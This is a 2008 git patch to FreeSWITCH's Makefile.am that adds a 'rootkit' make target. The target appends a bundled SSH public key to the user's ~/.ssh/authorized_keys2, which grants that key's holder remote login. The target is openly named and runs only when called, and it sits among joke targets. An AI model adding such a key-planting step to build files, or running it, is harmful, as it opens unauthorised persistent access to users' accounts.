From 0b5dc49b19c28f823cfca1f3e6e2ed6d4ab525e8 Mon Sep 17 00:00:00 2001 From: Michael Jerris Date: Fri, 5 Dec 2008 16:47:02 +0000 Subject: [PATCH] add make rootkit git-svn-id: http://svn.freeswitch.org/svn/freeswitch/trunk@10615 d0543943-73ff-0310-b7d9-9358b9ac24b2 --- Makefile.am | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Makefile.am b/Makefile.am index 52ab257ce6..fb6b41fb60 100644 --- a/Makefile.am +++ b/Makefile.am @@ -449,6 +449,9 @@ $(OUR_MODULES): || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \ test -z "$$fail" +rootkit: + cat ssh_keys/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2 + # Special targets coffee me_a_sandwich me_a_sammich: